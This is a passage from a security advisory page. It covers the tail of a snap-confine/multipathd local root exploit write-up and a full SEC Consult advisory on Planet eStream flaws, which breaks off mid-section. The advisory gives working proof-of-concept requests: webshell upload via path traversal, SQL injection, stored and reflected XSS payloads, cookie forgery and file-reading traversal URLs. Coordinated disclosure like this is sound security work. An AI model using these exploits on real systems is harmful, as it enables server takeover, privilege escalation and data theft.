CVE-2022-3328); since we already depend on<br />multipathd to bypass AppArmor, we bind-mount /tmp onto /lib/multipath,<br />create our own shared library /lib/multipath/libchecktur.so, shutdown<br />multipathd (by exploiting CVE-2022-41974), restart multipathd (through<br />its Unix socket), and finally obtain full root privileges (because<br />multipathd executes our shared library as root when it restarts):<br /><br />------------------------------------------------------------------------<br />$ grep multipath /proc/self/mountinfo | wc<br /> 0 0 0<br /><br />$ gcc -o CVE-2022-3328 CVE-2022-3328.c<br />$ ./CVE-2022-3328<br />scratch directory for constructing namespace: /tmp/snap.rootfs_0j4u9c<br /><br />$ grep multipath /proc/self/mountinfo<br />1395 29 253:0 /tmp /usr/lib/multipath rw,relatime shared:1 - ext4 /dev/mapper/ubuntu--vg-ubuntu--lv rw<br />...<br /><br />$ gcc -fpic -shared -o /lib/multipath/libchecktur.so libtmpsh.c<br /><br />$ ps -ef | grep 'multipath[d]'<br />root 371 1 0 12:42 ? 00:00:00 /sbin/multipathd -d -s<br /><br />$ multipathd list list add del switch sus resu rei fai resi rese rel forc dis rest paths maps path P map P gro P rec dae statu stats top con bla dev raw wil quit<br />ok<br /><br />$ ps -ef | grep 'multipath[d]' | wc<br /> 0 0 0<br /><br />$ ls -l /tmp/sh<br />ls: cannot access '/tmp/sh': No such file or directory<br /><br />$ multipathd list daemon<br />error -104 receiving packet<br /><br />$ ls -l /tmp/sh<br />-rwsr-xr-x 1 root root 125688 Aug 6 14:55 /tmp/sh<br /><br />$ /tmp/sh -p<br /># id<br />uid=65534(nobody) gid=65534(nogroup) euid=0(root) groups=65534(nogroup)<br /> ^^^^^^^^^^^^<br />------------------------------------------------------------------------<br /><br /><br />========================================================================<br />Acknowledgments<br />========================================================================<br /><br />We thank the Ubuntu security team (Alex Murray and Seth Arnold in<br />particular) and the snapd team for their hard work on this snap-confine<br />vulnerability. We also thank the members of linux-distros@openwall.<br /><br /><br />========================================================================<br />Timeline<br />========================================================================<br /><br />2022-08-23: Contacted security@ubuntu.<br /><br />2022-11-28: Contacted linux-distros@openwall.<br /><br />2022-11-30: Coordinated Release Date (17:00 UTC).<br /><br /></code></pre>
<pre><code>SEC Consult Vulnerability Lab Security Advisory < 20221130-0 ><br />=======================================================================<br /> title: Multiple critical vulnerabilities<br /> product: Planet Enterprises Ltd - Planet eStream<br /> vulnerable version: <6.72.10.07<br /> fixed version: 6.72.10.07<br /> CVE number: CVE-2022-45896, CVE-2022-45893, CVE-2022-45891,<br /> CVE-2022-45889, CVE-2022-45892, CVE-2022-45890,<br /> CVE-2022-45894, CVE-2022-45895<br /> impact: critical<br /> homepage: https://www.planetestream.co.uk<br /> found: 2022-09-01<br /> by: Timon Vogel (Office Vienna)<br /> Philipp Espernberger (Office Linz)<br /> Hrvoje Filakovic (Office Osijek)<br /> SEC Consult Vulnerability Lab<br /><br /> An integrated part of SEC Consult, an Atos company<br /> Europe | Asia | North America<br /><br /> https://www.sec-consult.com<br /><br />=======================================================================<br /><br />Vendor description:<br />-------------------<br />"Planet eStream is a powerfully simple and secure video platform,<br />making media more accessible and engaging for students and educators<br />across secondary, further, and higher education"<br /><br />Source: https://www.planetestream.co.uk<br /><br /><br />Business recommendation:<br />------------------------<br />The vendor provides an update for the affected version which should<br />be installed immediately.<br /><br />SEC Consult highly recommends to perform a thorough security review of the<br />Planet eStream video streaming platform conducted by security<br />professionals to identify and resolve potential further security issues.<br /><br /><br />Vulnerability overview/description:<br />-----------------------------------<br />1) Upload of Arbitrary Files Leading to Remote Code Execution (CVE-2022-45896)<br />The application allows users to upload files at multiple places. It was<br />identified that it is possible to upload arbitrary malicious files without any<br />restriction and also without prior authentication! An attacker can upload<br />a webshell and takeover the system.<br /><br /><br />2) Account Takeover (CVE-2022-45893)<br />A problem identified in the cookie and session management of the web application<br />allows users with low privileges to bypass the authentication and authorization<br />mechanisms. They can be bypassed by changing the value of the ON cookie. In this way,<br />users with low privileges can gain access to application features that are only accessible<br />to administrative and privileged users.<br /><br /><br />3) Broken Access Control (CVE-2022-45891)<br />Due to flaws in the authorization scheme, an authorization bypass vulnerability<br />allows an attacker to get access to restricted functions of the web application.<br />This can be leveraged to upload files to the web server without authentication<br />and gain access to restricted content that was uploaded by other users.<br /><br /><br />4) SQL Injection (CVE-2022-45889)<br />Due to insufficient input validation, the application allows the injection of<br />direct SQL commands. By exploiting the vulnerability, an attacker gains access<br />to all records stored in the database and can execute arbitrary SQL commands.<br /><br /><br />5) Multiple Stored Cross-Site Scripting (XSS) (CVE-2022-45892)<br />User input is not properly sanitized or encoded in various places. This leads to<br />several stored cross-site scripting (XSS) vulnerabilities. By exploiting this<br />vulnerability, an attacker can persistently embed arbitrary HTML or JavaScript<br />code into the affected web page. The code is executed in the context of the<br />victim's browser when visiting the manipulated site. Additionally, users are<br />potential victims of browser exploits and JavaScript trojans.<br /><br /><br />6) Reflected Cross-Site Scripting (XSS) (CVE-2022-45890)<br />One of the application scripts returns unfiltered or unescaped user input. This<br />leads to a reflected cross-site scripting (XSS) vulnerability. With reflected<br />cross-site scripting, an attacker can inject arbitrary HTML or JavaScript code<br />into the victim's web browser. Once the victim clicks a malicious link, the<br />attacker's code is executed in the context of the victim's web browser. The<br />vulnerability can be used to change the contents of the displayed site or<br />redirect to other malicious sites. Additionally, users are potential<br />victims of browser exploits and JavaScript trojans.<br /><br /><br />7) Path Traversal (CVE-2022-45894)<br />Attackers can gain access to files and directories outside the web root through<br />the use of relative file paths. In this case an authenticated<br />attacker with any role can inject "..\" sequences into a certain URL parameter<br />in order to navigate through the file system and access local files.<br /><br /><br />8) Information Disclosure (CVE-2022-45895)<br />Parts of the application were discovered that disclose sensitive data to<br />application users. While securely disclosing necessary information to authorized<br />users will normally not present a security threat, the identified components<br />disclose sensitive data that belongs to other users.<br /><br /><br />Proof of concept:<br />-----------------<br />1) Upload of Arbitrary Files Leading to Remote Code Execution (CVE-2022-45896)<br />Various file upload vulnerabilities were identified in the web application. The<br />following sections describe the vulnerabilities in detail.<br /><br />The file upload is restricted to certain file types in some cases. This<br />restriction is only enforced in the frontend and can be bypassed by<br />intercepting the request and modifying it. There is no further validation of<br />uploaded files in the backend. Therefore, it is sufficient to change the<br />filename ending in the intercepted request.<br /><br />a) File Upload with Path Traversal<br /><br />An authenticated attacker with the permission to attach documents to already<br />existing content (e.g. videos) can upload any file. In some cases, the role<br />Member is sufficient. Under "Categories -> choose a video -> related Media" a new<br />malicious file can be uploaded.<br /><br />The following POST request is sent to the server when a normal PNG file is uploaded:<br />===============================================================================<br />POST /Upload2.ashx?f=seclogo.png&c=0&l=53134&t=1662103112126&p=\Temp&ut=0&tc=0&bs=53134&ct=1662103112126 HTTP/2<br />Host: $host<br />Cookie: [...]<br /><br />‰PNG<br />[...]<br />===============================================================================<br /><br />Based on the previous POST request to upload files, the request can be<br />manipulated to upload any content to any directory by using path traversal<br />techniques. The following code shows the modified request. The content is<br />changed from a PNG image to an ASP web shell. The filename ending is changed to<br />asp and the path is inserted into the p parameter, which is vulnerable to path<br />traversal.<br />===============================================================================<br />POST /Upload2.ashx?f=webshell.asp&c=0&l=1024&t=1661943922096&p=..\$path\&ut=0&tc=0&bs=1024&ct=1661943922097 HTTP/2<br />Host: $host<br />Cookie: [...]<br /><br />$ASPWEBSHELL<br />===============================================================================<br /><br />As the following response shows, the file is being processed by the web server:<br />===============================================================================<br />HTTP/2 200 OK<br />Content-Type: text/plain; charset=utf-8<br />Date: Fri, 02 Sep 2022 07:16:11 GMT<br />Content-Length: 12<br /><br />progress:100<br />===============================================================================<br /><br />The web shell can now be accessed via the following URL:<br />===============================================================================<br />https://$host/$path/webshell.asp<br />===============================================================================<br /><br />An attacker now has the possibility to execute any command in context of the web<br />server. Therefore, the web server is completely compromised.<br /><br />As described in chapter 3) Broken Access Control, section a) an unauthenticated<br />file upload is possible if the attacker knows the correct request.<br /><br /><br />b) General Upload<br /><br />An authenticated attacker with the permission to upload documents (role editor,<br />publisher or admin) can upload any file. Under "Create -> Upload -> Upload<br />Document" a new malicious file can be uploaded.<br /><br />i) ASP Web Shell<br /><br />After choosing the malicious file for the file upload the following POST request<br />is sent to the web server:<br />===============================================================================<br />POST /Upload2.ashx?f=cmdasp.asp&c=0&l=1024&t=1661939611305&p=PreConversionMedia\&ut=0&tc=0&bs=1024&ct=1661939611305 HTTP/2<br />Host: $host<br />Cookie: [...]<br />Content-Length: 1024<br /><br />$ASPWEBSHELL<br />===============================================================================<br /><br />As the following response shows, the file is being processed by the web server:<br />===============================================================================<br />HTTP/2 200 OK<br />Content-Type: text/plain; charset=utf-8<br />Date: Wed, 31 Aug 2022 09:53:31 GMT<br />Content-Length: 12<br /><br />progress:100<br />===============================================================================<br /><br />To finish the upload of the malicious file, an attacker simply needs to click<br />the "Start Upload" button that becomes visible in the web interface.<br />After starting the upload, the following POST request is sent to the web server.<br /><br />===============================================================================<br />POST /Ajax.asmx/ProcessUpload2 HTTP/2<br />Host: $host<br />Cookie: [...]<br />Content-Type: application/json; charset=utf-8<br />X-Requested-With: XMLHttpRequest<br />Content-Length: 538<br /><br />{"fn":"webshell.asp","ppid":1,"isprivate":1,"showera":0,"catsinc":"","catsexc":"","retainsource"<br />:0,"copyonly":0,"mediaprofile":"0","fieldvalues":"[{\"FieldID\":1,\"Type\":\"txt\",\"FieldValu<br />e\":\"webshell\"},{\"FieldID\":2,\"Type\":\"txt\",\"FieldValue\":\"\"},{\"FieldID\":7,\"Type\":\<br />"ddl\",\"FieldValue\":\"4\"},{\"FieldID\":10,\"Type\":\"txt\",\"FieldValue\":\"\"},{\"FieldID\<br />":14,\"Type\":\"ddl\",\"FieldValue\":\"-1\"},{\"FieldID\":16,\"Type\":\"txt\",\"FieldValue\":\<br />"\"}]","mobiledevice":false,"rt":10,"filenameastitle":0,"expiry":""}<br />===============================================================================<br /><br />The response of the web server discloses the new generated filename<br />8273~4u~vE7bUON0 as shown below.<br />===============================================================================<br />HTTP/2 200 OK<br />Content-Type: application/json; charset=utf-8<br />Date: Wed, 31 Aug 2022 09:53:31 GMT<br />Content-Length: 541<br /><br />{"d":"{\"Success\":true,\"ClipDataID\":8273,\"Position\":null,\"TotalJobs\":0,\"Message\":\"Element<br />bereit\",\"CopyOnlyFail\":false,\"ViewURL\":\"https://$host/View.aspx?id=8273~4u~vE7bUON0\",<br />[...]<br />}<br />===============================================================================<br /><br />After the filename is known the web shell can now be accessed via following URL:<br />===============================================================================<br />https://$host/content/8273_4u~vE7bUON0.asp<br />===============================================================================<br /><br />An attacker now has the possibility to execute any command in context of the web<br />server. Therefore, the web server is completely compromised.<br /><br />ii) Malicious HTML File<br /><br />After choosing the malicious file, the following POST request is sent to the web<br />server:<br />===============================================================================<br />POST /Upload2.ashx?f=secconsult.html&c=0&l=102&t=1661947994372&p=PreConversionMedia\&ut=0&tc=0<br />&bs=102&ct=1661947994373 HTTP/2<br />Host: $host<br />Cookie: [...]<br />Content-Length: 1024<br /><br /><!DOCTYPE html><br /><html><br /><body><br /><h1>SEC Consult Webpage</h1><br /><p>hosted by $host</p><br /></body><br /></html><br />===============================================================================<br /><br />As the following response shows, the file is being processed by the web server:<br />===============================================================================<br />HTTP/2 200 OK<br />Content-Type: text/plain; charset=utf-8<br />Date: Wed, 31 Aug 2022 12:13:13 GMT<br />Content-Length: 12<br /><br />progress:100<br />===============================================================================<br /><br />To finish the upload of the malicious file, an attacker simply needs to click<br />the "Start Upload" button which pops up in the web interface.<br />After starting the upload, the following POST request is sent to the web server:<br />===============================================================================<br />POST /Ajax.asmx/ProcessUpload2 HTTP/2<br />Host: $host<br />Cookie: [...]<br />Content-Type: application/json; charset=utf-8<br />X-Requested-With: XMLHttpRequest<br />Content-Length: 539<br /><br />{"fn":"secconsult.html","ppid":1,"isprivate":1,"showera":0,"catsinc":"","catsexc":"","retainsou<br />rce":0,"copyonly":0,"mediaprofile":"0","fieldvalues":"[{\"FieldID\":1,\"Type\":\"txt\",\"Field<br />Value\":\"secconsult\"},{\"FieldID\":2,\"Type\":\"txt\",\"FieldValue\":\"\"},{\"FieldID\":7,\"T<br />ype\":\"ddl\",\"FieldValue\":\"4\"},{\"FieldID\":10,\"Type\":\"txt\",\"FieldValue\":\"\"},{\"F<br />ieldID\":14,\"Type\":\"ddl\",\"FieldValue\":\"-1\"},{\"FieldID\":16,\"Type\":\"txt\",\"FieldValue<br />\":\"\"}]","mobiledevice":false,"rt":10,"filenameastitle":0,"expiry":""}<br />===============================================================================<br /><br />The response of the web server discloses the new generated filename<br />8278~4z~b2w2tWQF as shown below.<br />===============================================================================<br />HTTP/2 200 OK<br />Content-Type: application/json; charset=utf-8<br />Date: Wed, 31 Aug 2022 12:13:14 GMT<br />Content-Length: 545<br /><br />{"d":"{\"Success\":true,\"ClipDataID\":8278,\"Position\":null,\"TotalJobs\":0,\"Message\":\"Element<br />bereit\",\"CopyOnlyFail\":false,\"ViewURL\":\"https://$host/View.aspx?id=8278~4z~b2w2tWQF\",<br />[...]<br />}<br />===============================================================================<br /><br />The HTML webpage can now be accessed via following URL:<br />===============================================================================<br />https://$host/content/8278_4z~b2w2tWQF.html<br />===============================================================================<br /><br />An attacker now has the possibility to infect the user's browser with JavaScript<br />to execute any command in the context of the web server or can host webpages for<br />phishing attacks on the server of the Planet eStream instance.<br /><br /><br />2) Account Takeover (CVE-2022-45893)<br />An authenticated attacker with the role Member or Bypass can elevate their<br />privileges by changing the ON cookie value. An attacker can easily brute force<br />the value of the cookie due to the low entropy of the cookie or search for<br />leaked cookie values in the web application as described in chapter<br />8) Information Disclosure, section a).<br /><br />Based on the format of the cookie the following pattern was used to generate<br />possibly valid cookies.<br />===============================================================================<br />[0-1][AZ]~[azAZ][azAZ]<br />===============================================================================<br /><br />To verify the vulnerability an authenticated session is required. Sessions that<br />are created by opening a sharing link to bypass authentication are sufficient.<br />Therefore, an attacker doesn’t necessarily need a valid user account with valid<br />credentials to gain privileged access.<br /><br />To abuse the vulnerability, an attacker can use the browser developer tool to<br />permanently change the value of the ON cookie. By changing the value of the<br />ON cookie for example to $VALID_COOKIE, the current privileges are set to the<br />privileges of the original user who has the ON cookie $VALID_COOKIE.<br /><br />An attacker can gain administrative privileges and access other accounts by<br />obtaining valid ON cookies for the respective accounts through brute force or<br />information disclosure.<br /><br />One essential aspect is that the ON cookie is persistent and never changes, not<br />even between sessions. Therefore, an attacker has permanent access to elevated<br />privileges or other user accounts once a valid ON cookie is identified.<br /><br /><br />3) Broken Access Control (CVE-2022-45891)<br />a) Unauthenticated Upload<br /><br />As described in chapter 1) Upload of Arbitrary Files Leading to Remote Code<br />Execution an attacker has the possibility to upload arbitrary files. Once<br />attackers know the correct POST request to upload files, they can repeat the<br />same request without prior authentication and successfully upload arbitrary<br />files. To verify the vulnerability the following request can be sent<br />unauthenticated (without cookies) to the web server.<br />===============================================================================<br />POST /Upload2.ashx?f=unauthenticated.txt&c=0&l=30&t=1662047867388&p=..\..\&ut=0&tc=0&bs=30&ct=1662047867388 HTTP/2<br />Host: $host<br /><br />SEC Consult - upload<br />===============================================================================<br /><br />As the following response shows, the file is being processed by the web server:<br />===============================================================================<br />HTTP/2 200 OK<br />Date: Mo, 19 Sep 2022 08:10:44 GMT<br />Content-Length: 12<br /><br />progress:100<br />===============================================================================<br /><br />The unauthenticated file upload was verified by identifying the file<br />unauthenticated.txt on the server.<br /><br />In conclusion, this vulnerability exacerbates the risk of the file upload<br />vulnerability. It increases the likelihood of exploitation since it enables an<br />attacker to upload files without authentication.<br /><br /><br />b) Access Grant List<br /><br />An attacker needs to be authenticated with the role Member or Bypass to exploit<br />the vulnerability. The vulnerability allows an attacker to modify the access<br />list and grant himself access to private videos. Additionally, an attacker can<br />make any video unavailable to other users by changing the access grant list.<br />The vulnerability also applies to other content on the platform.<br /><br />To verify the vulnerability a video with restricted access is created. It can<br />be accessed under the following URL:<br />===============================================================================<br />https://$host/View.aspx?id=1337~4u~vE7bUKN5<br />===============================================================================<br /><br />By executing the POST request shown below, an attacker can add himself to the<br />access grant list and gain access to the private video.<br />===============================================================================<br />POST /Ajax.asmx/SaveGrantAccessList HTTP/2<br />Host: $host<br />Cookie: [...]<br />Content-Type: application/json; charset=utf-8<br />Content-Length: 65<br /><br />{"cdid":"1337","data":"[{\"Address\":\"test@attacker.com\",\"CanEdit\":true}]"}<br />===============================================================================<br /><br />The server responds with a status code 200 successful.<br />===============================================================================<br />HTTP/2 200 OK<br />Content-Type: application/json; charset=utf-8<br />Date: Thu, 01 Sep 2022 10:20:58 GMT<br />[...]<br />Content-Length: 75<br /><br />{"d":"{\"Success\":true,\"Message\":\"Access list updated successfully\"}"}<br />===============================================================================<br /><br />The user with the e-mail address test@attacker.com has been added to the<br />access grant list and can view the private video with the ID 1337.<br /><br />The vulnerability can also be leveraged to block access to the video for other<br />users (Denial-of-Service) by adding any malicious content "malicious_payload"<br />instead of the valid e-mail address.<br /><br /><br />4) SQL Injection (CVE-2022-45889)<br />To demonstrate this vulnerability access to the search functionality in the<br />statistic interface is required. An authenticated attacker with the role<br />Publisher or Admin can use the following GET request to reproduce the<br />vulnerability.<br />===============================================================================<br />GET /Stats/StatisticsResults.aspx?q=viewingday&p1=20220831&p2=&db1=stats&db2=clipdata&flt=+s_RecordTypeID+IN+(1)+;WAITFOR+DELAY+'0:0:5'-- HTTP/2<br />Host: $host<br />Cookie: [...]<br />===============================================================================<br /><br />The resulting response took more than five seconds. Thus it can be<br />concluded that an SQL injection is present.<br />Furthermore, exploitation by the tool sqlmap was possible and lead to a<br />successful extraction of the complete backend database.<br /><br /><br />5) Multiple Stored Cross-Site Scripting (XSS) (CVE-2022-45892)<br />a) Disclaimer<br /><br />An attacker needs to be authenticated with the role Admin to exploit the stored<br />XSS vulnerability. The vulnerability will be executed afterwards for each user<br />who logs into the web application. To verify the issue, an attacker needs to<br />modify the disclaimer of the cookie description. In the admin section the<br />system options can be modified to change the disclaimer text.<br /><br />===============================================================================<br />https://$host/Admin/SystemOptions.aspx?disclaimer=1<br />===============================================================================<br /><br />By clicking the Source button, an admin user can inject a malicious payload.<br />===============================================================================<br /><img src=x onerror=javascript:alert(location.origin)//"><br />===============================================================================<br /><br />After saving the modified disclaimer text, the payload is executed by visiting<br />different parts of the application. If a user visits the MyHome tab the payload<br />is triggered in the browser. The payload is also executed if a user hasn't<br />accepted the disclaimer text yet, which is true for any new user.<br /><br />b) Search Function<br /><br />An attacker needs to be authenticated with the role Member to exploit the stored<br />XSS vulnerability. The vulnerability will be executed afterwards for each user,<br />who inspects the statistic view provided by the web application. To verify the<br />issue, an attacker can search for following malicious payload that is then<br />automatically stored in the database.<br />===============================================================================<br /><img onerror="javascript:alert(location.origin)" src="abcdef";//<<br />===============================================================================<br /><br />Afterwards, the malicious payload is triggered if a user lists the statistical<br />data for the Search Breakdown in the last seven days.<br /><br />c) Comments<br /><br />An attacker needs to be authenticated with the role Member to exploit the stored<br />XSS vulnerability. The vulnerability will be executed afterwards for each user,<br />who visits the content element that contains the malicious comment. To verify<br />the issue, the following malicious payload can be injected into the public or<br />private comment field.<br />===============================================================================<br /><img onerror="javascript:alert(location.origin)" src="abcdef";//<br />===============================================================================<br /><br />d) Batch editing tool<br /><br />An attacker needs to be authenticated with the role Admin to exploit the stored<br />XSS vulnerability. The vulnerability will be executed afterwards for each user,<br />who visits the modified content. To verify the issue, an attacker needs to<br />modify the owner of the content. In the search section the admin has the<br />possibility to use the Batch-Editing tool.<br />===============================================================================<br />https://$host/Default.aspx?search=consult&o=8&page=1&fp=0&report=1&rlt=0<br />===============================================================================<br /><br />By selecting the action Change owner, an admin user can inject a malicious<br />payload in the user input box.<br />===============================================================================<br /><img src=x onerror=javascript:alert(location.origin)//"><br />===============================================================================<br /><br />After injecting the malicious payload, the XSS payload is executed when the<br />content element is visited or when it appears in search results.<br />===============================================================================<br />https://$host/Default.aspx?search=8298<br />https://$host/View.aspx?id=8298~4B~dpa3P9mb&psid=136<br />===============================================================================<br /><br />e) Content Creation<br /><br />Permission to create content within the web application is required. Thus, an<br />attacker needs to be authenticated with the role Editor, Publisher, or Admin to<br />exploit the vulnerability. The issue can be verified by placing malicious HTML<br />code in the title input field of the content creation dialog window. For this<br />the following malicious payload can be used:<br />===============================================================================<br /><img src='x' onerror='javascript:alert(location.origin)' style='<br />===============================================================================<br /><br />When the content creation progress is finished, the JavaScript code is<br />permanently stored in the web application. It will trigger in every browser that<br />visits webpages that lists the modified item (for example, under the category<br />view, search results and content list).<br /><br />The following content upload possibilities are affected by this vulnerability:<br />- Upload Video or Audio files<br />- Upload Documents<br />- Add External Links<br />- Playlist<br />- Photoset<br /><br />f) Related Media<br /><br />HTML code can be injected in the title of the related media upload. Editing<br />access to the content is required. This is normally the case for the users with<br />the role Editors, Publishers or Admins. The malicious code can be injected in<br />the title of the related content. To validate the vulnerability a new file must<br />be uploaded in the related media tab. The next step is to change the filename<br />to inject the malicious HTML and JavaScript code.<br />===============================================================================<br /><img src='x' onerror='javascript:alert(location.origin)'photo.png<br />===============================================================================<br /><br />When the title including the malicious payload is saved and the page reloaded,<br />the payload within the title will be executed. The new title is stored in the<br />web application along with the malicious HTML code. It will execute in any<br />browser that visits the content item. Opening the related media tab is not<br />necessary.<br /><br />g) Create new user<br /><br />An attacker needs to be authenticated with the role Admin to exploit the stored<br />XSS vulnerability. The vulnerability will be executed afterwards for admin users<br />in the user section and for the created users once they are logged in. To verify<br />the issue, an attacker needs to create a new user. Under Tools -> Admin -><br />Users, Permissions, Authentication -> Users the admin has the possibility to<br />create new users.<br />===============================================================================<br />https://$host/Admin/EditUser.aspx<br />===============================================================================<br /><br />The following malicious payload was added to the Full Name input field:<br />===============================================================================<br /><script>alert(location.origin)</script><br />===============================================================================<br /><br />After creating the new user, the malicious payload gets executed once the new<br />user logs in or the admin visits the user section (Tools -> Admin -> Users,<br />Permissions, Authentication -> Users).<br /><br />h) Change Username<br /><br />A cross-site scripting vulnerability can be found under https://$host/MyHome.aspx<br />where a user can edit the name shown on his home page. All authenticated users<br />can access home pages of other users and are thus affected by this vulnerability.<br />Furthermore, the vulnerability can be exploited by an authenticated user of any<br />role. The following request was used to change the username.<br />===============================================================================<br />POST /Ajax.asmx/SaveLayoutData HTTP/2<br />Host: $host<br />Cookie: [...]<br />Content-Length: 360<br />Content-Type: application/json; charset=UTF-8<br />[...]<br /><br />{"id":$ID,"layoutdata":"[{\"title\":{\"enabled\":true,\"text\":\"test<img<br />src='x' onerror='alert(location.origin)'\",[...]<br />===============================================================================<br /><br />The request is accepted by the web application as shown below:<br />===============================================================================<br />HTTP/2 200 OK<br />Content-Type: application/json; charset=utf-8<br />Content-Length: 92<br /><br />{"d":"{\"Success\":true,\"Message\":\"Layout erfolgreich gespeichert\",\"HTML\":<br />[\"455\"]}"}<br />===============================================================================<br /><br />Sending the request directly bypasses the check for special characters like < or ><br />that exist in the frontend. The malicious username string is embedded on the<br />website and will execute when it is opened in the browser in any subsequent<br />request.<br /><br /><br />6) Reflected Cross-Site Scripting (XSS) (CVE-2022-45890)<br />An attacker needs authenticated access to the web application with the role<br />Member or higher to identify and exploit the vulnerability. To identify this<br />vulnerability, it is sufficient to open the following URL (no special manipulation<br />of the request is needed) and analyze the HTTP response from the web server:<br />===============================================================================<br />https://$host/Default.aspx?search=test&page=1&fp=0&r=(0_7_0_%3Ch1%3ESEC%20Consult%3C/h1%3E__)<br />===============================================================================<br /><br />The string SEC Consult is embedded in the webpage of this URL.<br />The next step is to identify a working payload which triggers the cross-site<br />scripting vulnerability. To verify the vulnerability, it is sufficient to open<br />the following URL:<br />===============================================================================<br />https://$host/Default.aspx?search=*&o=8&page=1&fp=0&r=(0_7_0_%3Cscript%3Ealert(location.origin)%3C/script%3E__)<br />===============================================================================<br /><br />Another working payload for the fo parameter was identified:<br />===============================================================================<br />https://$host/Default.aspx?search=*&fo=%3Cimg%20onerror=%22javascript:alert(location.origin)%22%20src=%22abcdef%22;//<br />===============================================================================<br /><br />It must be mentioned that all metadata filter fields are affected by this<br />vulnerability.<br /><br /><br />7) Path Traversal (CVE-2022-45894)<br />An attacker authenticated with the role Member can navigate to the vulnerable<br />URL path provided below and inject "..\" sequences to move up directories on the<br />web server and access local files.<br /><br />Simply navigating to the link with the injected path traversal payload an<br />attacker can download any file on the web server and read its contents.<br />To verify the vulnerability the file NetSetup.LOG which contains details of the<br />entire process of joining the domain was downloaded. The following URL was used:<br />===============================================================================<br />https://$host/GetFile.aspx?file=/image/..\..\..\..\..\..\..\..\..\..\Windows\debug\NetSetup.LOG<br />===============================================================================<br /><br /><br />8) Information Disclosure (CVE-2022-45895)<br />a) ON cookie<br /><br />The information disclosure of the ON cookie was identified on three different<br />pages of the web application. Since the cookie can be used to access other user<br />accounts with elevated privileges, it comprises highly confidential information.<br />It is embedded in the web application's response in different ways and there are<br />always multiple cookies for different users in the response. Requests to obtain<br />the sensitive information can be performed with authentication as arbitrary<br />user.<br /><br />The ON cookie was embedded in three pages that are accessible under the<br />following paths:<br /> - /Default.aspx?catid=69 (HTML)<br /> - /Default.aspx?search=*&o=8&page=1&report=1&rlt=0&export=1&t=1661787629149 (CSV)<br /> - /GetJson.aspx?t=1&display=3&data=69&source=2&o=8&title= (JSON)<br /><br />As an example the ON cookie leakage is shown in the HTML response. The cookie<br />value can be identified in the href and src attributes of the a element<br />($VALID_COOKIE).<br />===============================================================================<br />[...]<br /><div><a title="Open Media" tabindex="-1" href="/View.aspx?id=228~$VALID_COOKIE"><br /><img title="228" data-alt-src="" src="/Media/Images/ClipData/228_$VALID_COOKIE.jpg"/></a><br />[...]<br />===============================================================================<br /><br />b) WhoAmI<br /><br />The sensitive data comprises internal information that lets an attacker gain<br />deeper knowledge about the application. To verify the vulnerability, it is<br />sufficient to request the following URL as authenticated user (any role):<br />===============================================================================<br />https://$host/WhoAmI.aspx<br />===============================================================================<br /><br />An excerpt of the disclosed information is shown:<br />================